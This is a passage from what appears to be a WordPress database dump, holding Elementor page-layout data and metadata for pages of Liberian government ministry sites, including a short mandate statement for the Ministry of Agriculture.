Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"98191f5\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"1a23dcc\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"10985b1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"aba2824\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c927a2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"3e2a906\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"daadead\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ea59929\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"1a23dcc\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"d679c64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4cae02f\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false}]'),(9543,1663,'_elementor_controls_usage','a:6:{s:11:\"text-editor\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:1;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:3:{s:10:\"text_color\";i:1;s:21:\"typography_typography\";i:1;s:20:\"typography_font_size\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:5;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}s:7:\"section\";a:3:{s:5:\"count\";i:5;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:5;}}}}s:6:\"spacer\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}s:7:\"heading\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:3;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:1:{s:5:\"title\";i:2;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:5:{s:11:\"title_color\";i:2;s:21:\"typography_typography\";i:2;s:22:\"typography_font_family\";i:2;s:20:\"typography_font_size\";i:2;s:22:\"typography_font_weight\";i:2;}}}}s:9:\"shortcode\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:17:\"section_shortcode\";a:1:{s:9:\"shortcode\";i:1;}}}}}'),(9544,1663,'_elementor_edit_mode','builder'),(9545,1663,'_elementor_template_type','wp-post'),(9546,1663,'_elementor_version','2.7.5'),(9547,1663,'_wp_page_template','default'),(9548,1663,'_elementor_data','[{\"id\":\"42f3301\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e4b6de6\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"a1bb6a5\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"7f350b3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Ministry\'s mandate is to develop the agriculture sector in Liberia. MOA\\u00a0creates an enabling environment for a more dynamic and vibrant agricultural sector to ensure sustainable food security and employment opportunities for all Liberians.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"800b01c\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"740d473\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"264bc6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9d731f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c927a2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"3e2a906\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ae041f9\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"daadead\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"759bc05\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"138bbb1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"bb7acbb\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"855e3aa\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" term=\\\"document_tag:moa\\\" columns=\\\"title,excerpt,cf:download_link,tax:document_category\\\" widths=\\\"350px,900px,auto,auto\\\" links=\\\"terms\\\" filters=\\\"false\\\" rows_per_page=\\\"5\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(9549,1664,'_elementor_controls_usage','a:5:{s:11:\"text-editor\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:1;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:3:{s:10:\"text_color\";i:1;s:21:\"typography_typography\";i:1;s:20:\"typography_font_size\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:6;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}s:7:\"section\";a:3:{s:5:\"count\";i:6;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:6;}}}}s:6:\"spacer\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}s:7:\"heading\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:3;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:1:{s:5:\"title\";i:2;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:5:{s:11:\"title_color\";i:2;s:21:\"typography_typography\";i:2;s:22:\"typography_font_family\";i:2;s:20:\"typography_font_size\";i:2;s:22:\"typography_font_weight\";i:2;}}}}}'),(9550,1664,'_elementor_edit_mode','builder'),(9551,1664,'_elementor_template_type','wp-post'),(9552,1664,'_elementor_version','2.7.5'),(9553,1664,'_wp_page_template','default'),(9554,1664,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2d39894\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Ministry is mandated to ensure strict adherence to insurance standards and regulations in collaboration with insurance agencies operating in the country.<\\/p><p>Through its special project, the MOT provides weather and climate information services to key sectors such as: environment, health, energy, water resources, transport (land, air and sea), agriculture and disaster risk reduction, as well as daily weather forecasts to the general public.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c7fea51\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"610c742\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"aedbee8\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"740d473\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"264bc6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9d731f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ffa0bcb\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b7e060f\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"1f2dfb6\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"c79a044\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c927a2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"3e2a906\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"daadead\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b726dd5\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b7e060f\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"bbc7e37\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"33d4d35\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false}]'),(9555,1665,'_elementor_controls_usage','a:5:{s:11:\"text-editor\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:1;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:3:{s:10:\"text_color\";i:1;s:21:\"typography_typography\";i:1;s:20:\"typography_font_size\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:6;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}s:7:\"section\";a:3:{s:5:\"count\";i:6;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:6;}}}}s:6:\"spacer\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}s:7:\"heading\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:3;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:1:{s:5:\"title\";i:2;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:5:{s:11:\"title_color\";i:2;s:21:\"typography_typography\";i:2;s:22:\"typography_font_family\";i:2;s:20:\"typography_font_size\";i:2;s:22:\"typography_font_weight\";i:2;}}}}}'),(9556,1665,'_elementor_edit_mode','builder'),(9557,1665,'_elementor_template_type','wp-post'),(9558,1665,'_elementor_version','2.7.5'),(9559,1665,'_wp_page_template','default'),(9560,1665,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"fee7624\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Coming up<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c7fea51\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"610c742\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"6091519\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"740d473\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"264bc6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9d731f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6f9a877\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8467a48\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"91e7e6d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"bf79dc8\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c927a2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"3e2a906\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"daadead\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related 